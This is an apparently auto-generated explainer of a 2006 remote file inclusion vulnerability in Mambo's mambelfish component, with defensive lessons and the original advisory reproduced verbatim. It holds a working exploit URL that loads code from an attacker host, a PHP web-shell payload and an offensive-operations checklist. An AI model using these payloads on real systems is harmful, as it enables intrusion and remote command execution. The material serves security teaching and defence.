By exploitdb papers bot•August 17, 2006•

papers

Understanding the Mambo mambelfish RFI Vulnerability (2006)

What this paper is

This paper describes a Remote File Inclusion (RFI) vulnerability found in the com_mambelfish component of Mambo, a popular Content Management System (CMS) at the time. The vulnerability allows an attacker to trick the web application into including and executing arbitrary files from a remote server.

Simple technical breakdown

The core of the vulnerability lies in how Mambo's com_mambelfish component handles configuration paths. Specifically, it uses a variable named $mosConfig_absolute_path to build the full path to other required files. If an attacker can control the value of $mosConfig_absolute_path and point it to a remote URL, the application might be tricked into fetching and executing code from that remote URL instead of a local file. This is a classic Remote File Inclusion (RFI) vulnerability.

Complete code and payload walkthrough

The paper highlights a specific line of code and an exploit example.

Vulnerable Code Snippet:

require_once( "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php" );

Explanation:

require_once(): This is a PHP construct that includes and evaluates a specified file. If the file has already been included, require_once() will not include it again.
"$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php": This is the path to a file that the application needs to function. The critical part here is $mosConfig_absolute_path.

The Vulnerability:

The vulnerability exists because the value of $mosConfig_absolute_path is not properly sanitized or validated before being used in the require_once() statement. If an attacker can inject a URL into $mosConfig_absolute_path, PHP's require_once() function, when dealing with URLs (especially when allow_url_include is enabled in php.ini), can fetch and execute the content of that remote URL.

Exploit Example:

http://www.site.com/[path]/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

Explanation of the Exploit:

http://www.site.com/: The target website.
[path]/administrator/components/com_mambelfish/mambelfish.class.php: This is the script that contains the vulnerable require_once() call. The attacker is directly targeting this file.
?mosConfig_absolute_path=: This is how the attacker injects a value into the $mosConfig_absolute_path variable via a GET request.
http://site.com/evilscript.txt: This is the attacker's controlled remote server and a file containing malicious PHP code.
?: The trailing question mark is often used to terminate the query string for the target script, ensuring that the mosConfig_absolute_path parameter is correctly interpreted by the remote script if it also expects query parameters.

Mapping:

require_once( "$mosConfig_absolute_path/..." ) -> Practical Purpose: To load necessary library files for the mambelfish component.
mosConfig_absolute_path variable -> Practical Purpose: Intended to hold the absolute path to the Mambo installation's root directory on the server.
http://site.com/evilscript.txt -> Practical Purpose: The attacker's remote server hosting malicious PHP code. When included by the vulnerable server, this code will be executed.

Payload (Conceptual):

The evilscript.txt would contain PHP code. A common payload for RFI would be something like:

<?php
system($_GET['cmd']);
?>

When the vulnerable server includes http://site.com/evilscript.txt?cmd=ls, the system() function would execute the ls command on the vulnerable server, and the output would be returned as part of the web response.

Practical details for offensive operations teams

Required Access Level: Unauthenticated. This is a web-based vulnerability exploitable via HTTP requests.
Lab Preconditions:
- A target web server running Mambo with the com_mambelfish component installed.
- The allow_url_include directive must be enabled in the target server's php.ini configuration. This is a crucial prerequisite and was often disabled by default for security reasons, but might be enabled on misconfigured servers.
- The target server must be able to make outbound HTTP requests to the attacker's controlled server.
- An attacker-controlled web server capable of serving PHP files or plain text that will be interpreted as PHP.
Tooling Assumptions:
- A web browser for manual testing.
- A web proxy (e.g., Burp Suite, OWASP ZAP) for intercepting and modifying requests.
- A simple HTTP server (e.g., Python's http.server, netcat) or a dedicated web server (Apache, Nginx) to host the malicious payload.
- A vulnerability scanner that can identify RFI vulnerabilities (though manual verification is always recommended).
Execution Pitfalls:
- allow_url_include disabled: The most common reason for failure. If this PHP setting is Off, the server will not execute remote files.
- Firewall/Network Restrictions: The target server might be prevented from making outbound connections to the attacker's server.
- Input Validation/WAF: A Web Application Firewall (WAF) or overly strict input validation on the target application might block the malicious URL.
- Incorrect Path: The [path] in the exploit URL might be wrong, or the com_mambelfish component might not be installed at the expected location.
- Payload Interpretation: The remote file might be served with the wrong Content-Type header, preventing PHP execution.
- Trailing Characters: The exact syntax of the exploit URL, especially the trailing ?, can sometimes matter depending on how the target script handles query parameters.
Expected Telemetry:
- Outbound HTTP Request: The target server will attempt to connect to the attacker's server to fetch evilscript.txt. This will appear in network logs.
- Web Server Logs: The target web server will log the request for mambelfish.class.php with the injected mosConfig_absolute_path parameter.
- PHP Error Logs: If allow_url_include is off or the remote file cannot be fetched, PHP error logs on the target server might record warnings or errors related to file inclusion.
- Payload Execution Logs: If the payload executes commands (e.g., using system()), these command executions might be logged by the operating system or application logs on the target server.
- Access Logs on Attacker Server: The attacker's server will log the incoming HTTP request for evilscript.txt.

Where this was used and when

Context: This vulnerability was prevalent in the mid-2000s within PHP web applications, particularly Content Management Systems (CMS) like Mambo and its successor, Joomla!. RFI was a common attack vector against such platforms.
Approximate Years: The paper was published in August 2006. Vulnerabilities of this nature were actively discovered and exploited in the years leading up to and following this date, roughly 2005-2008.

Defensive lessons for modern teams

Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file paths, database queries, or system commands. Always sanitize and validate input rigorously.
Secure PHP Configuration:
- Keep allow_url_include and allow_url_fopen set to Off in php.ini unless absolutely necessary for specific, controlled use cases.
- Regularly review and harden php.ini settings.
Principle of Least Privilege: Ensure web applications run with the minimum necessary permissions.
Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns like RFI. Keep WAF rules updated.
Regular Patching and Updates: Keep all CMS, plugins, themes, and underlying software (PHP, web server) up-to-date with the latest security patches. This vulnerability was specific to an older version of Mambo.
Dependency Management: Be aware of the libraries and components used by your applications. Vulnerabilities can exist in third-party code.
Network Segmentation and Egress Filtering: Restrict outbound network connections from web servers to only necessary destinations. This can prevent a successful RFI from reaching out to an attacker's server.

ASCII visual (if applicable)

+-----------------+       +-------------------------+       +-----------------+
| Attacker Server | ----> | Target Web Server (Mambo)| ----> | Target Database |
| (Hosts evil.txt)|       | (Vulnerable Component)  |       +-----------------+
+-----------------+       +-----------+-------------+
                                      |
                                      | (HTTP Request)
                                      | mosConfig_absolute_path=http://attacker.com/evil.txt
                                      |
                                      v
                            +-------------------------+
                            | PHP Interpreter         |
                            | (Processes require_once)|
                            +-------------------------+
                                      |
                                      | (Includes remote file)
                                      |
                                      v
                            +-------------------------+
                            | Attacker's evil.txt     |
                            | (Contains PHP payload)  |
                            | (Executed on Target)    |
                            +-------------------------+

Source references

Paper ID: 2202
Paper Title: Mambo Component mambelfish 1.1 - Remote File Inclusion
Author: mdx
Published: 2006-08-17
Keywords: PHP, webapps
Paper URL: https://www.exploit-db.com/papers/2202
Raw URL: https://www.exploit-db.com/raw/2202

Original Exploit-DB Content (Verbatim)

####################################################
#                                                  #
#         C Y BE R - W A R R i O R   T I M         #
#                                                  #
####################################################

mambo com_mambelfish Component (mosConfig_absolute_path) Remote File
Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote

####################################################

cont@ct: bilkopat[at]hotmail[dot]com

####################################################

Code: mambelfish.class.php?, line 28
***************************************************************************************************

  require_once( "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php" );

***************************************************************************************************


Exploit:
http://www.site.com/[path]/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

####################################################
Greetz: Cyber-warrior TIM USERS
####################################################

# milw0rm.com [2006-08-17]